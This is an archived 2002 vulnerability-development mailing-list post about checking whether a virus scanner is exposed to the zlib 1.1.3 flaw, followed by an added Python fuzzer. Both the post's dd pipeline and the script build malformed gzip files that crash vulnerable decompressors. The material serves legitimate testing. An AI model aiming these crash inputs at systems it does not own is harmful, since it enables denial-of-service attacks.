Vulnerability Development mailing list archives

Testing zlib vulnerability


From: Mathieu Lafon <Mathieu.Lafon () insalien org>
Date: Thu, 21 Mar 2002 21:38:19 +0100


I use a proprietary virus scanner that I highly suspect to use a statically
linked zlib 1.1.3 (according to find-zlib.pl). The vendor tells me he 'thinks'
it is not vulnerable, but I want to be sure myself (and to force him to
release a version compiled with zlib 1.1.4).

I tried to create an evil gz file by using a standard gz header, followed
by random data, and tested it against minigzip (included in the zlib sources).

Surprisingly, it is very easy to create a file that crashes zlib:

( cat *.c | gzip -9 | dd bs=1 count=80 ; dd if=/dev/urandom bs=1 count=100 ) | ./minigzip -d
Segmentation fault

With count=80, it's only a few tries.

I also tried this with zlib 1.1.4 and (hopefully) only got
./minigzip: failed gzclose

Once I got an evil gz file, I tried my closed-source virus scanner but I have
not been able to crash it.

Is there any reason that my scanner does not crash if it uses zlib-1.1.3 ?

Has anyone already tried (and succeeded) to crash a program this way instead of
trying to detect zlib in the binary?

Thanks,
-- 
Mathieu Lafon
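The pipeline in the post (a valid gzip prefix of 80 bytes followed by 100 random bytes, piped into a decompressor) can be scripted so that many variants are tried and the outcome is classified by exit status or signal rather than by eyeballing "Segmentation fault". The following is an added example, not code from the post or from zlib; it assumes the target reads the stream from stdin the way `./minigzip -d` does in the post's own pipeline, and the output file name `evil.gz` is a hypothetical choice. It goes slightly beyond the post in that it also inflates each sample with the interpreter's own zlib, which (like 1.1.4's minigzip) should report an error and never crash.

```python
#!/usr/bin/env python3
"""Reproduce the post's recipe: a valid gzip prefix followed by random junk,
fed to a decompressor, with the result classified by exit status / signal.
Added example; not code from the original post or from zlib."""
import gzip
import random
import signal
import subprocess
import sys
import zlib

# Constructed seed input: the first 256 bytes are incompressible, so the gzip
# stream is comfortably longer than the 80-byte prefix the post keeps.
SEED_DATA = bytes(range(256)) * 8


def make_good_gz(seed_data=SEED_DATA):
    """A well-formed gzip stream, the equivalent of 'gzip -9' on stdin
    (10-byte header, no filename field, deflate data, 8-byte trailer)."""
    return gzip.compress(seed_data, compresslevel=9)


def make_evil_gz(seed_data=SEED_DATA, keep=80, junk_len=100, rng=None):
    """Cut the good stream at `keep` bytes and append `junk_len` random bytes.
    The header survives intact, so the decoder sees a truncated deflate
    stream followed by garbage, exactly what the post's dd pipeline builds."""
    rng = rng or random.Random(0)          # fixed seed: reproducible sample
    junk = bytes(rng.getrandbits(8) for _ in range(junk_len))
    return make_good_gz(seed_data)[:keep] + junk


def decode_in_process(blob):
    """Inflate with this interpreter's own zlib. Returns ('ok', nbytes) or
    ('error', message). A correct decoder must report an error here, never
    crash (cf. 1.1.4's 'failed gzclose' in the post)."""
    try:
        out = zlib.decompress(blob, 16 + zlib.MAX_WBITS)  # 16+: gzip wrapper
        return ("ok", len(out))
    except zlib.error as exc:
        return ("error", str(exc))


def classify_exit(returncode):
    """Map a subprocess return code to 'ok', 'exit:N' or 'crash:SIGNAME'.
    subprocess reports death by signal as a negative return code."""
    if returncode == 0:
        return "ok"
    if returncode < 0:
        return "crash:" + signal.Signals(-returncode).name
    return "exit:%d" % returncode


def run_target(cmd, blob, timeout=10):
    """Pipe `blob` into `cmd` (e.g. ['./minigzip', '-d']) on stdin."""
    proc = subprocess.run(cmd, input=blob, stdout=subprocess.DEVNULL,
                          stderr=subprocess.PIPE, timeout=timeout)
    return classify_exit(proc.returncode), proc.stderr


def fuzz(cmd, tries=50, keep=80, junk_len=100, seed=0):
    """Repeat the post's experiment `tries` times with fresh junk each time.
    Returns (verdict, stderr, blob) for the first sample that crashed, or
    None if the target only ever exited cleanly or with an error status."""
    rng = random.Random(seed)
    for _ in range(tries):
        blob = make_evil_gz(keep=keep, junk_len=junk_len, rng=rng)
        verdict, err = run_target(cmd, blob)
        if verdict.startswith("crash:"):
            return verdict, err, blob
    return None


if __name__ == "__main__":
    # usage: python3 fuzz_gz.py ./minigzip -d   (script name is hypothetical)
    if len(sys.argv) < 2:
        sys.exit("usage: %s <decompressor command...>" % sys.argv[0])
    hit = fuzz(sys.argv[1:])
    if hit is None:
        print("no crash in target after fuzzing")
    else:
        verdict, err, blob = hit
        with open("evil.gz", "wb") as f:   # hypothetical output name
            f.write(blob)
        print("target died with", verdict, "- sample saved to evil.gz")
```

A saved sample that crashes minigzip is also the right input to hand to the vendor: a program that statically links the same zlib but scans the file without ever inflating it (or only inflates after its own sanity checks) will not crash, which is one reason a scanner can survive a file that kills minigzip.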


